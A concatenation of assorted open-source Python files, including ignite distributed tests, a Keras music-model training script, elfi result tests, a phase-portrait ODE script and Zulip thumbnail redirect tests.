import torch import ignite.distributed as idist from tests.ignite.distributed.utils import ( _sanity_check, _test_distrib__get_max_length, _test_distrib_all_gather, _test_distrib_all_reduce, _test_distrib_barrier, _test_distrib_broadcast, _test_sync, ) def test_no_distrib(capsys): assert idist.backend() is None if torch.cuda.is_available(): assert idist.device().type == "cuda" else: assert idist.device().type == "cpu" assert idist.get_rank() == 0 assert idist.get_world_size() == 1 assert idist.get_local_rank() == 0 assert idist.model_name() == "serial" from ignite.distributed.utils import _model, _SerialModel _sanity_check() assert isinstance(_model, _SerialModel) idist.show_config() captured = capsys.readouterr() out = captured.err.split("\r") out = list(map(lambda x: x.strip(), out)) out = list(filter(None, out)) assert "ignite.distributed.utils INFO: distributed configuration: serial" in out[-1] assert "ignite.distributed.utils INFO: backend: None" in out[-1] if torch.cuda.is_available(): assert "ignite.distributed.utils INFO: device: cuda" in out[-1] else: assert "ignite.distributed.utils INFO: device: cpu" in out[-1] assert "ignite.distributed.utils INFO: rank: 0" in out[-1] assert "ignite.distributed.utils INFO: local rank: 0" in out[-1] assert "ignite.distributed.utils INFO: world size: 1" in out[-1] def test_sync_no_dist(): from ignite.distributed.comp_models import _SerialModel _test_sync(_SerialModel) def test_idist_methods_no_dist(): assert idist.get_world_size() < 2 assert idist.backend() is None, f"{idist.backend()}" def test_idist__model_methods_no_dist(): _test_distrib__get_max_length("cpu") if torch.cuda.device_count() > 1: _test_distrib__get_max_length("cuda") def test_idist_collective_ops_no_dist(): _test_distrib_all_reduce("cpu") _test_distrib_all_gather("cpu") _test_distrib_barrier("cpu") _test_distrib_broadcast("cpu") if torch.cuda.device_count() > 1: _test_distrib_all_reduce("cuda") _test_distrib_all_gather("cuda") _test_distrib_barrier("cuda") _test_distrib_broadcast("cuda")
src/train.py
anirbanlahiri2017/Tartarus
104
62624
from __future__ import print_function import argparse from collections import OrderedDict import json import os import logging from keras.callbacks import EarlyStopping from sklearn.preprocessing import normalize from sklearn.metrics import roc_curve, auc, roc_auc_score, precision_score, recall_score, f1_score, accuracy_score, average_precision_score from scipy.sparse import csr_matrix from keras.utils.io_utils import HDF5Matrix #from keras.utils.visualize_util import plot from keras.optimizers import SGD, Adam from sklearn.metrics import r2_score import numpy as np import theano.tensor as tt import pandas as pd import random import common import models from predict import obtain_predictions from eval import do_eval import h5py class Config(object): """Configuration for the training process.""" def __init__(self, params, normalize=False, whiten=True): self.model_id = common.get_next_model_id() self.norm = normalize self.whiten = whiten self.x_path = '%s_%sx%s' % (params['dataset']['dataset'],params['dataset']['npatches'],params['dataset']['window']) self.y_path = '%s_%s_%s' % (params['dataset']['fact'],params['dataset']['dim'],params['dataset']['dataset']) self.dataset_settings = params['dataset'] self.training_params = params['training'] self.model_arch = params['cnn'] self.predicting_params = params['predicting'] def get_dict(self): object_dict = self.__dict__ first_key = "model_id" conf_dict = OrderedDict({first_key: object_dict[first_key]}) conf_dict.update(object_dict) return conf_dict def _squared_magnitude(x): return tt.sqr(x).sum(axis=-1) def _magnitude(x): return tt.sqrt(tt.maximum(_squared_magnitude(x), np.finfo(x.dtype).tiny)) def cosine(x, y): return tt.clip((1 - (x * y).sum(axis=-1) / (_magnitude(x) * _magnitude(y))) / 2, 0, 1) def load_sparse_csr(filename): loader = np.load(filename) return csr_matrix(( loader['data'], loader['indices'], loader['indptr']), shape = loader['shape']) def build_model(config): """Builds the cnn.""" params = config.model_arch get_model = getattr(models, 'get_model_'+str(params['architecture'])) model = get_model(params) #model = model_kenun.build_convnet_model(params) # Learning setup t_params = config.training_params sgd = SGD(lr=t_params["learning_rate"], decay=t_params["decay"], momentum=t_params["momentum"], nesterov=t_params["nesterov"]) adam = Adam(lr=0.001, beta_1=0.9, beta_2=0.999, epsilon=1e-08) optimizer = eval(t_params['optimizer']) metrics = ['mean_squared_error'] if config.model_arch["final_activation"] == 'softmax': metrics.append('categorical_accuracy') if t_params['loss_func'] == 'cosine': loss_func = eval(t_params['loss_func']) else: loss_func = t_params['loss_func'] model.compile(loss=loss_func, optimizer=optimizer,metrics=metrics) return model def load_data_preprocesed(params, X_path, Y_path, dataset, val_percent, test_percent, n_samples, with_metadata=False, only_metadata=False, metadata_source='rovi'): factors = np.load(common.DATASETS_DIR+'/y_train_'+Y_path+'.npy') # OJO remove S index_factors = open(common.DATASETS_DIR+'/items_index_train_'+dataset+'.tsv').read().splitlines() if not only_metadata: all_X = np.load(common.TRAINDATA_DIR+'/X_train_'+X_path+'.npy') index_train = open(common.TRAINDATA_DIR+'/index_train_%s.tsv' % (X_path)).read().splitlines() all_Y = np.zeros((len(index_train),factors.shape[1])) index_factors_inv = dict() for i,item in enumerate(index_factors): index_factors_inv[item] = i for i,item in enumerate(index_train): all_Y[i,:] = factors[index_factors_inv[item]] else: all_Y = factors if with_metadata: if 'w2v' in metadata_source: all_X_meta = np.load(common.TRAINDATA_DIR+'/X_train_%s_%s.npy' % (metadata_source,dataset))[:,:int(params['cnn']['sequence_length'])] elif 'model' in metadata_source or not params['dataset']['sparse']: all_X_meta = np.load(common.TRAINDATA_DIR+'/X_train_%s_%s.npy' % (metadata_source,dataset)) else: all_X_meta = load_sparse_csr(common.TRAINDATA_DIR+'/X_train_%s_%s.npz' % (metadata_source,dataset)).todense() all_X_in_meta = all_X = all_X_meta print(all_X.shape) print(all_Y.shape) if n_samples != 'all': n_samples = int(n_samples) all_X = all_X[:n_samples] all_Y = all_Y[:n_samples] if with_metadata: all_X_in_meta = all_X_in_meta[:n_samples] if params['training']['normalize_y'] == True: normalize(all_Y,copy=False) if params['training']["val_from_file"]: Y_val = np.load(common.DATASETS_DIR+'/y_val_'+Y_path+'.npy') Y_test = np.load(common.DATASETS_DIR+'/y_test_'+Y_path+'.npy') #!!! OJO remove S from trainS if params['dataset']['sparse']: X_val = load_sparse_csr(common.TRAINDATA_DIR+'/X_val_%s_%s.npz' % (metadata_source,dataset)).todense() X_test = load_sparse_csr(common.TRAINDATA_DIR+'/X_test_%s_%s.npz' % (metadata_source,dataset)).todense() else: X_val = np.load(common.TRAINDATA_DIR+'/X_val_%s_%s.npy' % (metadata_source,dataset)) X_test = np.load(common.TRAINDATA_DIR+'/X_test_%s_%s.npy' % (metadata_source,dataset)) X_train = all_X Y_train = all_Y else: N = all_Y.shape[0] train_percent = 1 - val_percent - test_percent N_train = int(train_percent * N) N_val = int(val_percent * N) logging.debug("Training data points: %d" % N_train) logging.debug("Validation data points: %d" % N_val) logging.debug("Test data points: %d" % (N - N_train - N_val)) if not only_metadata: # Slice data X_train = all_X[:N_train] X_val = all_X[N_train:N_train + N_val] X_test = all_X[N_train + N_val:] Y_train = all_Y[:N_train] Y_val = all_Y[N_train:N_train + N_val] Y_test = all_Y[N_train + N_val:] if with_metadata: if only_metadata: X_train = all_X_in_meta[:N_train] X_val = all_X_in_meta[N_train:N_train + N_val] X_test = all_X_in_meta[N_train + N_val:] else: X_train = [X_train,all_X_in_meta[:N_train]] X_val = [X_val,all_X_in_meta[N_train:N_train + N_val]] X_test = [X_test,all_X_in_meta[N_train + N_val:]] return X_train, Y_train, X_val, Y_val, X_test, Y_test def load_data_hf5(params,val_percent, test_percent): hdf5_file = common.PATCHES_DIR+"/patches_train_%s_%s.hdf5" % (params['dataset']['dataset'],params['dataset']['window']) f = h5py.File(hdf5_file,"r") N = f["targets"].shape[0] f.close() train_percent = 1 - val_percent - test_percent N_train = int(train_percent * N) N_val = int(val_percent * N) X_train = HDF5Matrix(hdf5_file, 'features', start=0, end=N_train) Y_train = HDF5Matrix(hdf5_file, 'targets', start=0, end=N_train) X_val = HDF5Matrix(hdf5_file, 'features', start=N_train, end=N_train+N_val) Y_val = HDF5Matrix(hdf5_file, 'targets', start=N_train, end=N_train+N_val) X_test = HDF5Matrix(hdf5_file, 'features', start=N_train+N_val, end=N) Y_test = HDF5Matrix(hdf5_file, 'targets', start=N_train+N_val, end=N) return X_train, Y_train, X_val, Y_val, X_test, Y_test, N_train def load_data_hf5_memory(params,val_percent, test_percent, y_path, id2gt, X_meta = None, val_from_file = False): if val_from_file: hdf5_file = common.PATCHES_DIR+"/patches_train_%s_%sx%s.hdf5" % (params['dataset']['dataset'],params['dataset']['npatches'],params['dataset']['window']) f = h5py.File(hdf5_file,"r") index_train = f["index"][:] index_train = np.delete(index_train, np.where(index_train == "")) N_train = index_train.shape[0] val_hdf5_file = common.PATCHES_DIR+"/patches_val_%s_%sx%s.hdf5" % (params['dataset']['dataset'],params['dataset']['npatches'],params['dataset']['window']) f_val = h5py.File(val_hdf5_file,"r") X_val = f_val['features'][:] #Y_val = f_val['targets'][:] factors_val = np.load(common.DATASETS_DIR+'/y_val_'+y_path+'.npy') index_factors_val = open(common.DATASETS_DIR+'/items_index_val_'+params['dataset']['dataset']+'.tsv').read().splitlines() id2gt_val = dict((index,factor) for (index,factor) in zip(index_factors_val,factors_val)) index_val = [i for i in f_val['index'][:] if i in id2gt_val] X_val = np.delete(X_val, np.where(index_val == ""), axis=0) index_val = np.delete(index_val, np.where(index_val == "")) Y_val = np.asarray([id2gt_val[id] for id in index_val]) test_hdf5_file = common.PATCHES_DIR+"/patches_test_%s_%sx%s.hdf5" % (params['dataset']['dataset'],params['dataset']['npatches'],params['dataset']['window']) f_test = h5py.File(test_hdf5_file,"r") X_test = f_test['features'][:] #Y_test = f_test['targets'][:] factors_test = np.load(common.DATASETS_DIR+'/y_test_'+y_path+'.npy') index_factors_test = open(common.DATASETS_DIR+'/items_index_test_'+params['dataset']['dataset']+'.tsv').read().splitlines() id2gt_test = dict((index,factor) for (index,factor) in zip(index_factors_test,factors_test)) index_test = [i for i in f_test['index'][:] if i in id2gt_test] X_test = np.delete(X_test, np.where(index_test == ""), axis=0) index_test = np.delete(index_test, np.where(index_test == "")) Y_test = np.asarray([id2gt_test[id] for id in index_test]) else: hdf5_file = common.PATCHES_DIR+"/patches_train_%s_%sx%s.hdf5" % (params['dataset']['dataset'],params['dataset']['npatches'],params['dataset']['window']) f = h5py.File(hdf5_file,"r") index_all = f["index"][:] N = index_all.shape[0] train_percent = 1 - val_percent - test_percent N_train = int(train_percent * N) N_val = int(val_percent * N) X_val = f['features'][N_train:N_train+N_val] index_val = f['index'][N_train:N_train+N_val] X_val = np.delete(X_val, np.where(index_val == ""), axis=0) index_val = np.delete(index_val, np.where(index_val == "")) Y_val = np.asarray([id2gt[id] for id in index_val]) X_test = f['features'][N_train+N_val:N] index_test = f['index'][N_train+N_val:N] print(index_test.shape) print(X_test.shape) X_test = np.delete(X_test, np.where(index_test == ""), axis=0) index_test = np.delete(index_test, np.where(index_test == "")) print(index_test.shape) print(X_test.shape) Y_test = np.asarray([id2gt[id] for id in index_test]) print(Y_test.shape) index_train = f['index'][:N_train] index_train = np.delete(index_train, np.where(index_train == "")) N_train = index_train.shape[0] if X_meta != None: X_val = [X_val,X_meta[N_train:N_train+N_val]] X_test = [X_test,X_meta[N_train+N_val:N]] return X_val, Y_val, X_test, Y_test, N_train def batch_block_generator(params, y_path, N_train, id2gt, X_meta=None, val_from_file=False): hdf5_file = common.PATCHES_DIR+"/patches_train_%s_%sx%s.hdf5" % (params['dataset']['dataset'],params['dataset']['npatches'],params['dataset']['window']) f = h5py.File(hdf5_file,"r") block_step = 50000 batch_size = params['training']['n_minibatch'] randomize = True with_meta = False if X_meta != None: with_meta = True while 1: for i in range(0, N_train, block_step): x_block = f['features'][i:min(N_train, i+block_step)] index_block = f['index'][i:min(N_train, i+block_step)] #y_block = f['targets'][i:min(N_train,i+block_step)] x_block = np.delete(x_block, np.where(index_block == ""), axis=0) index_block = np.delete(index_block, np.where(index_block == "")) y_block = np.asarray([id2gt[id] for id in index_block]) if params['training']['normalize_y']: normalize(y_block, copy=False) items_list = range(x_block.shape[0]) if randomize: random.shuffle(items_list) for j in range(0, len(items_list), batch_size): if j+batch_size <= x_block.shape[0]: items_in_batch = items_list[j:j+batch_size] x_batch = x_block[items_in_batch] y_batch = y_block[items_in_batch] if with_meta: x_batch = [x_batch, X_meta[items_in_batch]] yield (x_batch, y_batch) def process(params,with_predict=True,with_eval=True): logging.basicConfig(format='%(asctime)s %(message)s', level=logging.DEBUG) params['cnn']['n_out'] = int(params['dataset']['dim']) #params['cnn']['n_frames'] = int(params['dataset']['window'] * SR / float(HR)) with_metadata = params['dataset']['with_metadata'] only_metadata = params['dataset']['only_metadata'] metadata_source = params['dataset']['meta-suffix'] if with_metadata: if 'w2v' in metadata_source: X_meta = np.load(common.TRAINDATA_DIR+'/X_train_%s_%s.npy' % (metadata_source,params['dataset']['dataset']))[:,:int(params['cnn']['sequence_length'])] params['cnn']['n_metafeatures'] = len(X_meta[0]) if 'meta-suffix2' in params['dataset']: X_meta2 = np.load(common.TRAINDATA_DIR+'/X_train_%s_%s.npy' % (params['dataset']['meta-suffix2'],params['dataset']['dataset'])) params['cnn']['n_metafeatures2'] = len(X_meta2[0]) if 'meta-suffix3' in params['dataset']: X_meta3 = np.load(common.TRAINDATA_DIR+'/X_train_%s_%s.npy' % (params['dataset']['meta-suffix3'],params['dataset']['dataset'])) params['cnn']['n_metafeatures3'] = len(X_meta3[0]) if 'meta-suffix4' in params['dataset']: X_meta4 = np.load(common.TRAINDATA_DIR+'/X_train_%s_%s.npy' % (params['dataset']['meta-suffix4'],params['dataset']['dataset'])) params['cnn']['n_metafeatures4'] = len(X_meta4[0]) elif 'model' in metadata_source or not params['dataset']['sparse']: X_meta = np.load(common.TRAINDATA_DIR+'/X_train_%s_%s.npy' % (metadata_source,params['dataset']['dataset'])) params['cnn']['n_metafeatures'] = len(X_meta[0]) if 'meta-suffix2' in params['dataset']: X_meta2 = np.load(common.TRAINDATA_DIR+'/X_train_%s_%s.npy' % (params['dataset']['meta-suffix2'],params['dataset']['dataset'])) params['cnn']['n_metafeatures2'] = len(X_meta2[0]) if 'meta-suffix3' in params['dataset']: X_meta3 = np.load(common.TRAINDATA_DIR+'/X_train_%s_%s.npy' % (params['dataset']['meta-suffix3'],params['dataset']['dataset'])) params['cnn']['n_metafeatures3'] = len(X_meta3[0]) if 'meta-suffix4' in params['dataset']: X_meta4 = np.load(common.TRAINDATA_DIR+'/X_train_%s_%s.npy' % (params['dataset']['meta-suffix4'],params['dataset']['dataset'])) params['cnn']['n_metafeatures4'] = len(X_meta4[0]) else: X_meta = load_sparse_csr(common.TRAINDATA_DIR+'/X_train_%s_%s.npz' % (metadata_source,params['dataset']['dataset'])).todense() params['cnn']['n_metafeatures'] = X_meta.shape[1] if 'meta-suffix2' in params['dataset']: X_meta2 = load_sparse_csr(common.TRAINDATA_DIR+'/X_train_%s_%s.npz' % (params['dataset']['meta-suffix2'],params['dataset']['dataset'])) params['cnn']['n_metafeatures2'] = X_meta2.shape[1] if 'meta-suffix3' in params['dataset']: X_meta3 = load_sparse_csr(common.TRAINDATA_DIR+'/X_train_%s_%s.npz' % (params['dataset']['meta-suffix3'],params['dataset']['dataset'])) params['cnn']['n_metafeatures3'] = len(X_meta3[0]) if 'meta-suffix4' in params['dataset']: X_meta4 = load_sparse_csr(common.TRAINDATA_DIR+'/X_train_%s_%s.npz' % (params['dataset']['meta-suffix4'],params['dataset']['dataset'])) params['cnn']['n_metafeatures3'] = len(X_meta4[0]) print(X_meta.shape) else: X_meta = None config = Config(params) model_dir = os.path.join(common.MODELS_DIR, config.model_id) common.ensure_dir(common.MODELS_DIR) common.ensure_dir(model_dir) model_file = os.path.join(model_dir, config.model_id + common.MODEL_EXT) logging.debug("Building Network...") #model = build_model(config) model = build_model(config) print(model.summary()) #plot(model, to_file='model2.png', show_shapes=True) trained_model = config.get_dict() # Save model #plot(model, to_file=os.path.join(model_dir, config.model_id + PLOT_EXT)) common.save_model(model, model_file) logging.debug(trained_model["model_id"]) logging.debug("Loading Data...") with_generator = True if only_metadata: X_train, Y_train, X_val, Y_val, X_test, Y_test = \ load_data_preprocesed(params, config.x_path, config.y_path, params['dataset']['dataset'], config.training_params["validation"], config.training_params["test"], config.dataset_settings["nsamples"], with_metadata, only_metadata, metadata_source) if 'meta-suffix2' in params['dataset']: X_train2, Y_train2, X_val2, Y_val2, X_test2, Y_test2 = \ load_data_preprocesed(params, config.x_path, config.y_path, params['dataset']['dataset'], config.training_params["validation"], config.training_params["test"], config.dataset_settings["nsamples"], with_metadata, only_metadata, params['dataset']['meta-suffix2']) X_train = [X_train,X_train2] X_val = [X_val,X_val2] X_test = [X_test,X_test2] print("X_train bi", len(X_train)) if 'meta-suffix3' in params['dataset']: X_train3, Y_train3, X_val3, Y_val3, X_test3, Y_test3 = \ load_data_preprocesed(params, config.x_path, config.y_path, params['dataset']['dataset'], config.training_params["validation"], config.training_params["test"], config.dataset_settings["nsamples"], with_metadata, only_metadata, params['dataset']['meta-suffix3']) X_train.append(X_train3) X_val.append(X_val3) X_test.append(X_test3) print("X_train tri", len(X_train)) if 'meta-suffix4' in params['dataset']: X_train4, Y_train4, X_val4, Y_val4, X_test4, Y_test4 = \ load_data_preprocesed(params, config.x_path, config.y_path, params['dataset']['dataset'], config.training_params["validation"], config.training_params["test"], config.dataset_settings["nsamples"], with_metadata, only_metadata, params['dataset']['meta-suffix4']) X_train.append(X_train4) X_val.append(X_val4) X_test.append(X_test4) print("X_train four", len(X_train)) else: if with_generator: id2gt = dict() factors = np.load(common.DATASETS_DIR+'/y_train_'+config.y_path+'.npy') index_factors = open(common.DATASETS_DIR+'/items_index_train_'+params['dataset']['dataset']+'.tsv').read().splitlines() id2gt = dict((index,factor) for (index,factor) in zip(index_factors,factors)) X_val, Y_val, X_test, Y_test, N_train = load_data_hf5_memory(params,config.training_params["validation"],config.training_params["test"],config.y_path,id2gt,X_meta,config.training_params["val_from_file"]) if params['dataset']['nsamples'] != 'all': N_train = min(N_train,params['dataset']['nsamples']) else: X_train, Y_train, X_val, Y_val, X_test, Y_test, N_train = load_data_hf5(params,config.training_params["validation"],config.training_params["test"]) trained_model["whiten_scaler"] = common.TRAINDATA_DIR+'/scaler_%s.pk' % config.x_path logging.debug("Training...") if config.model_arch["final_activation"] == 'softmax': monitor_metric = 'val_categorical_accuracy' else: monitor_metric = 'val_loss' early_stopping = EarlyStopping(monitor=monitor_metric, patience=4) if only_metadata: epochs = model.fit(X_train, Y_train, batch_size=config.training_params["n_minibatch"], #shuffle='batch', nb_epoch=config.training_params["n_epochs"], verbose=1, validation_data=(X_val, Y_val), callbacks=[early_stopping]) else: if with_generator: print(N_train) epochs = model.fit_generator(batch_block_generator(params,config.y_path,N_train,id2gt,X_meta,config.training_params["val_from_file"]), samples_per_epoch = N_train-(N_train % config.training_params["n_minibatch"]), nb_epoch = config.training_params["n_epochs"], verbose=1, validation_data = (X_val, Y_val), callbacks=[early_stopping]) else: epochs = model.fit(X_train, Y_train, batch_size=config.training_params["n_minibatch"], shuffle='batch', nb_epoch=config.training_params["n_epochs"], verbose=1, validation_data=(X_val, Y_val), callbacks=[early_stopping]) model.save_weights(os.path.join(model_dir, config.model_id + common.WEIGHTS_EXT)) logging.debug("Saving trained model %s in %s..." % (trained_model["model_id"], common.DEFAULT_TRAINED_MODELS_FILE)) common.save_trained_model(common.DEFAULT_TRAINED_MODELS_FILE, trained_model) logging.debug("Evaluating...") print(X_test[0].shape,X_test[1].shape) preds=model.predict(X_test) print(preds.shape) if params["dataset"]["evaluation"] in ['binary','multiclass']: y_pred = (preds > 0.5).astype('int32') acc = accuracy_score(Y_test,y_pred) prec = precision_score(Y_test,y_pred,average='macro') recall = recall_score(Y_test,y_pred,average='macro') f1 = f1_score(Y_test,y_pred,average='macro') print('Accuracy', acc) print("%.3f\t%.3f\t%.3f" % (prec,recall,f1)) if params["dataset"]["fact"] == 'class': good_classes = np.nonzero(Y_test.sum(0))[0] print(Y_test.shape,preds.shape) #roc_auc=roc_auc_score(Y_test[:,good_classes],preds[:,good_classes]) #logging.debug('ROC-AUC '+str(roc_auc)) #pr_auc = average_precision_score(Y_test[:,good_classes],preds[:,good_classes]) #print('PR-AUC',pr_auc) #r2 = roc_auc elif params["dataset"]["evaluation"] not in ['binary','multiclass','multilabel']: r2s = [] for i,pred in enumerate(preds): r2 = r2_score(Y_test[i],pred) r2s.append(r2) r2 = np.asarray(r2s).mean() logging.debug('R2 avg '+str(r2)) # Batch prediction if X_test[1].shape == Y_test[1].shape: score = model.evaluate(X_test, Y_test, verbose=0) logging.debug(score) logging.debug(model.metrics_names) print(score) trained_model["loss_score"] = score[0] trained_model["mse"] = score[1] if params["dataset"]["evaluation"] not in ['binary','multiclass','multilabel']: trained_model["r2"] = r2 fw=open(common.DATA_DIR+'/results/train_results.txt','a') fw.write(trained_model["model_id"]+'\n') if params["training"]["loss_func"] == 'binary_crossentropy': fw.write('ROC-AUC: '+str(roc_auc)+'\n') print('ROC-AUC: '+str(roc_auc)) fw.write('Loss: '+str(score[0])+' ('+config.training_params["loss_func"]+')\n') fw.write('MSE: '+str(score[1])+'\n') elif params["dataset"]["evaluation"] not in ['binary','multiclass','multilabel']: fw.write('R2 avg: '+str(r2)+'\n') print('R2 avg: '+str(r2)) fw.write('Loss: '+str(score[0])+' ('+config.training_params["loss_func"]+')\n') fw.write('MSE: '+str(score[1])+'\n') fw.write(json.dumps(epochs.history)+"\n\n") fw.close() if with_predict: trained_models = pd.read_csv(common.DEFAULT_TRAINED_MODELS_FILE, sep='\t') model_config = trained_models[trained_models["model_id"] == trained_model["model_id"]] model_config = model_config.to_dict(orient="list") testset = open(common.DATASETS_DIR+'/items_index_test_%s.tsv' % (config.dataset_settings["dataset"])).read().splitlines() if config.training_params["val_from_file"] and not only_metadata: predictions, predictions_index = obtain_predictions(model_config, testset, trained_model["model_id"], config.predicting_params["trim_coeff"], model=model, with_metadata=with_metadata, only_metadata=only_metadata, metadata_source=metadata_source, with_patches=True) else: predictions, predictions_index = obtain_predictions(model_config, testset, trained_model["model_id"], config.predicting_params["trim_coeff"], model=model, with_metadata=with_metadata, only_metadata=only_metadata, metadata_source=metadata_source) print("Predictions created") if with_eval: do_eval(trained_model["model_id"],get_roc=True,get_map=True,get_p=True,predictions=predictions,predictions_index=predictions_index) if __name__ == '__main__': parser = argparse.ArgumentParser( description='Evaluates the model', formatter_class=argparse.ArgumentDefaultsHelpFormatter) parser.add_argument('-p', '--params', dest="params_file", help='JSON file with params', default=False) parser.add_argument('-pred', '--predict', dest="with_predict", help='Predict factors', action='store_true', default=False) parser.add_argument('-eval', '--eval', dest="with_eval", help='Eval factors', action='store_true', default=False) parser.add_argument('-m', '--metadata', dest="with_metadata", help='Use metadata', action='store_true', default=False) parser.add_argument('-om', '--only_metadata', dest="only_metadata", help='Use only metadata', action='store_true', default=False) parser.add_argument('-ms', '--metadata_source', dest="metadata_source", type=str, help='Suffix of metadata files', default="rovi") args = parser.parse_args() params = models.params_1 if args.params_file: params = json.load(open(args.params_file)) process(params)
torba/torba/client/errors.py
mittalkartik2000/lbry-sdk
4,076
62699
<reponame>mittalkartik2000/lbry-sdk class InsufficientFundsError(Exception): pass
kafka_influxdb/tests/encoder_test/test_heapster_json_encoder.py
gldnspud/kafka-influxdb
224
62715
import unittest from kafka_influxdb.encoder import heapster_json_encoder class TestHeapsterJsonEncoder(unittest.TestCase): def setUp(self): self.encoder = heapster_json_encoder.Encoder() def testEncoder(self): msg = b'{ "MetricsName":"memory/major_page_faults","MetricsValue":{"value":56}, "MetricsTimestamp":"2017-01-19T17:26:00Z", "MetricsTags":{"container_name":"docker/9be430d3a1a28601292aebd76e15512d5471c630a7fa164d6a2a2fd9cbc19e3d"} } ' encoded_message = self.encoder.encode(msg) expected_msg = [ 'memory/major_page_faults,container_name=docker/9be430d3a1a28601292aebd76e15512d5471c630a7fa164d6a2a2fd9cbc19e3d value=56 1484846760'] self.assertEqual(encoded_message, expected_msg)
hail/python/cluster-tests/cluster-write-many-partitions.py
tdeboer-ilmn/hail
789
62717
<gh_stars>100-1000 import hail as hl ht = hl.utils.range_table(1_000_000, n_partitions=10_000) # use HDFS so as not to create garbage on GS ht.write('/tmp/many_partitions.ht') mt = hl.utils.range_matrix_table(1_000_000, 2, n_partitions=10_000) mt.write('/tmp/many_partitions.mt')
src/dev/steve/Escape_T6/logs/statsDistances.py
wvat/NTRTsim
148
62721
""" Prints the min, avg, max of the numbers on each line """ import sys try: f = open(sys.argv[1], 'r') lines = 0 sum = 0 max = 0 min = 9999999 for line in f: lines += 1 x = float(line.partition(',')[0]) sum += x if x < min: min = x if x > max: max = x print "min: " + str(min) print "avg: " + str((sum / lines)) print "max: " + str(max) finally: f.close()
tests/unit/test_results.py
diadochos/elfi
166
62722
<gh_stars>100-1000 import numpy as np import pytest import elfi def test_sample(): n_samples = 10 parameter_names = ['a', 'b'] distance_name = 'dist' samples = [ np.random.random(n_samples), np.random.random(n_samples), np.random.random(n_samples) ] outputs = dict(zip(parameter_names + [distance_name], samples)) sample = elfi.methods.results.Sample( method_name="TestRes", outputs=outputs, parameter_names=parameter_names, discrepancy_name=distance_name, something='x', something_else='y', n_sim=0, ) assert sample.method_name == "TestRes" assert hasattr(sample, 'samples') assert sample.n_samples == n_samples assert sample.dim == len(parameter_names) assert not sample.is_multivariate assert np.allclose(samples[0], sample.samples_array[:, 0]) assert np.allclose(samples[1], sample.samples_array[:, 1]) assert np.allclose(samples[-1], sample.discrepancies) assert hasattr(sample, 'something') assert sample.something_else == 'y' with pytest.raises(AttributeError): sample.not_here # Test summary sample.summary() def test_bolfi_sample(): n_chains = 3 n_iters = 10 warmup = 5 parameter_names = ['a', 'b'] chains = np.random.random((n_chains, n_iters, len(parameter_names))) result = elfi.methods.results.BolfiSample( method_name="TestRes", chains=chains, parameter_names=parameter_names, warmup=warmup, something='x', something_else='y', n_sim=0, ) assert result.method_name == "TestRes" assert hasattr(result, 'samples') assert hasattr(result, 'chains') assert hasattr(result, 'outputs') assert result.n_samples == n_chains * (n_iters - warmup) assert result.dim == len(parameter_names) assert not result.is_multivariate # verify that chains are merged correctly s0 = np.concatenate([chains[i, warmup:, 0] for i in range(n_chains)]) s1 = np.concatenate([chains[i, warmup:, 1] for i in range(n_chains)]) assert np.allclose(s0, result.samples[parameter_names[0]]) assert np.allclose(s1, result.samples[parameter_names[1]]) assert hasattr(result, 'something') assert result.something_else == 'y' @pytest.mark.parametrize('multivariate_model', [3], indirect=True) def test_multivariate(multivariate_model): n_samples = 10 rej = elfi.Rejection(multivariate_model['d'], batch_size=5) sample = rej.sample(n_samples) assert sample.outputs['t1'].shape == (n_samples, 3) assert sample.outputs['d'].shape == (n_samples,) assert sample.is_multivariate
Anaconda-files/Program_03a.py
arvidl/dynamical-systems-with-applications-using-python
106
62800
<filename>Anaconda-files/Program_03a.py # Program 03a: Phase portrait of a linear system. # See Figure 3.8(a). import matplotlib.pyplot as plt import numpy as np from scipy.integrate import odeint import pylab as pl # The 2-dimensional linear system a, b, c, d = 2, 1, 1, 2 def dx_dt(x, t): return [a*x[0] + b*x[1], c*x[0] + d*x[1]] # Trajectories in forward time ts = np.linspace(0, 4, 100) ic = np.linspace(-1, 1, 5) for r in ic: for s in ic: x0 = [r, s] xs = odeint(dx_dt, x0, ts) plt.plot(xs[:, 0], xs[:, 1], 'r-') # Trajectories in backward time ts = np.linspace(0, -4, 100) ic = np.linspace(-1, 1, 5) for r in ic: for s in ic: x0 = [r, s] xs = odeint(dx_dt, x0, ts) plt.plot(xs[:, 0], xs[:, 1], 'r-') # Label the axes and set fontsizes plt.xlabel('x', fontsize=15) plt.ylabel('y', fontsize=15) plt.tick_params(labelsize=15) plt.xlim(-1, 1) plt.ylim(-1, 1) # Plot the vectorfield. See lines 10, 12 for system. X, Y = np.mgrid[-1:1:10j, -1:1:10j] u = a*X + b*Y v = c*X + d*Y pl.quiver(X, Y, u, v, color='b') plt.show()
zerver/tests/test_thumbnail.py
Pulkit007/zulip
17,004
62815
<gh_stars>1000+ from io import StringIO import orjson from zerver.lib.test_classes import ZulipTestCase class ThumbnailTest(ZulipTestCase): def test_thumbnail_redirect(self) -> None: self.login("hamlet") fp = StringIO("zulip!") fp.name = "zulip.jpeg" result = self.client_post("/json/user_uploads", {"file": fp}) self.assert_json_success(result) json = orjson.loads(result.content) self.assertIn("uri", json) uri = json["uri"] base = "/user_uploads/" self.assertEqual(base, uri[: len(base)]) result = self.client_get("/thumbnail", {"url": uri[1:], "size": "full"}) self.assertEqual(result.status_code, 302, result) self.assertEqual(uri, result.url) self.login("iago") result = self.client_get("/thumbnail", {"url": uri[1:], "size": "full"}) self.assertEqual(result.status_code, 403, result) self.assert_in_response("You are not authorized to view this file.", result) uri = "https://www.google.com/images/srpr/logo4w.png" result = self.client_get("/thumbnail", {"url": uri, "size": "full"}) self.assertEqual(result.status_code, 302, result) base = "https://external-content.zulipcdn.net/external_content/56c362a24201593891955ff526b3b412c0f9fcd2/68747470733a2f2f7777772e676f6f676c652e636f6d2f696d616765732f737270722f6c6f676f34772e706e67" self.assertEqual(base, result.url) uri = "http://www.google.com/images/srpr/logo4w.png" result = self.client_get("/thumbnail", {"url": uri, "size": "full"}) self.assertEqual(result.status_code, 302, result) base = "https://external-content.zulipcdn.net/external_content/7b6552b60c635e41e8f6daeb36d88afc4eabde79/687474703a2f2f7777772e676f6f676c652e636f6d2f696d616765732f737270722f6c6f676f34772e706e67" self.assertEqual(base, result.url) uri = "//www.google.com/images/srpr/logo4w.png" result = self.client_get("/thumbnail", {"url": uri, "size": "full"}) self.assertEqual(result.status_code, 302, result) base = "https://external-content.zulipcdn.net/external_content/676530cf4b101d56f56cc4a37c6ef4d4fd9b0c03/2f2f7777772e676f6f676c652e636f6d2f696d616765732f737270722f6c6f676f34772e706e67" self.assertEqual(base, result.url)
specutils/tests/test_utils.py
havok2063/specutils
118
62823
